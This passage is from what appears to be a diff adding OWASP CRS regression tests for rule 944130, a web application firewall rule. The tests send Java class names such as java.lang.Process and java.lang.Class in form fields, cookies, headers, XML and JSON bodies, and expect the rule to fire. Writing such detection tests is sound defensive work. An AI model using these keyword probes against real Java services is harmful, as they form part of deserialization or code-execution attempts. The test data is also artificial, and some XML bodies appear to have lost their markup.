input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.StringReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-265 + desc: "Argument test includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Class" + output: + log_contains: "id \"944130\"" + - test_title: 944130-266 + desc: "Argument name includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Class=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-267 + desc: "Cookie test includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + Cookie: test=java.lang.Class + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-268 + desc: "Cookie name includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Class=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-269 + desc: "Request header test includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Class + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-270 + desc: "XML attribute value includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-271 + desc: "XML element value includes keyword java.lang.Class" + stages: + - stage: + input: 
+ dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Class" + output: + log_contains: "id \"944130\"" + - test_title: 944130-272 + desc: "Nested XML element value includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Class" + output: + log_contains: "id \"944130\"" + - test_title: 944130-273 + desc: "Content-Type text/plain includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Class" + output: + log_contains: "id \"944130\"" + - test_title: 944130-274 + desc: "Content-Type application/json arg value includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + 
method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Class\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-275 + desc: "Content-Type application/json arg name includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.Class\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-276 + desc: "Argument test includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Integer" + output: + log_contains: "id \"944130\"" + - test_title: 944130-277 + desc: "Argument name includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Integer=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-278 + desc: "Cookie test includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + 
headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Integer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-279 + desc: "Cookie name includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Integer=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-280 + desc: "Request header test includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Integer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-281 + desc: "XML attribute value includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 
Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-282 + desc: "XML element value includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Integer" + output: + log_contains: "id \"944130\"" + - test_title: 944130-283 + desc: "Nested XML element value includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Integer" + output: + log_contains: "id \"944130\"" + - test_title: 944130-284 + desc: "Content-Type text/plain includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Integer" + output: + log_contains: "id \"944130\"" + - test_title: 944130-285 + desc: "Content-Type application/json arg value includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" 
+ port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Integer\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-286 + desc: "Content-Type application/json arg name includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.Integer\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-287 + desc: "Argument test includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Number" + output: + log_contains: "id \"944130\"" + - test_title: 944130-288 + desc: "Argument name includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Number=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-289 + desc: "Cookie test includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Number + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-290 + desc: "Cookie name includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Number=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-291 + desc: "Request header test includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Number + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-292 + desc: "XML attribute value includes keyword java.lang.Number" + 
stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-293 + desc: "XML element value includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Number" + output: + log_contains: "id \"944130\"" + - test_title: 944130-294 + desc: "Nested XML element value includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Number" + output: + log_contains: "id \"944130\"" + - test_title: 944130-295 + desc: "Content-Type text/plain includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + 
method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Number" + output: + log_contains: "id \"944130\"" + - test_title: 944130-296 + desc: "Content-Type application/json arg value includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Number\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-297 + desc: "Content-Type application/json arg name includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.Number\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-298 + desc: "Argument test includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Object" + output: + log_contains: "id \"944130\"" + - test_title: 944130-299 + desc: "Argument name includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 
+ headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Object=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-300 + desc: "Cookie test includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Object + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-301 + desc: "Cookie name includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Object=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-302 + desc: "Request header test includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Object + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-303 + desc: "XML attribute value includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-304 + desc: "XML element value includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Object" + output: + log_contains: "id \"944130\"" + - test_title: 944130-305 + desc: "Nested XML element value includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Object" + output: + log_contains: "id \"944130\"" + - test_title: 944130-306 + desc: "Content-Type text/plain includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + 
Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Object" + output: + log_contains: "id \"944130\"" + - test_title: 944130-307 + desc: "Content-Type application/json arg value includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Object\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-308 + desc: "Content-Type application/json arg name includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.Object\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-309 + desc: "Argument test includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Process" + output: + log_contains: "id \"944130\"" + - test_title: 944130-310 + desc: "Argument name includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Process=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-311 + desc: "Cookie test includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Process + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-312 + desc: "Cookie name includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Process=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-313 + desc: "Request header test includes keyword java.lang.Process" + stages: + - 
stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Process + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-314 + desc: "XML attribute value includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-315 + desc: "XML element value includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Process" + output: + log_contains: "id \"944130\"" + - test_title: 944130-316 + desc: "Nested XML element value includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Process" + output: + log_contains: "id \"944130\"" + - test_title: 944130-317 + desc: "Content-Type text/plain includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Process" + output: + log_contains: "id \"944130\"" + - test_title: 944130-318 + desc: "Content-Type application/json arg value includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 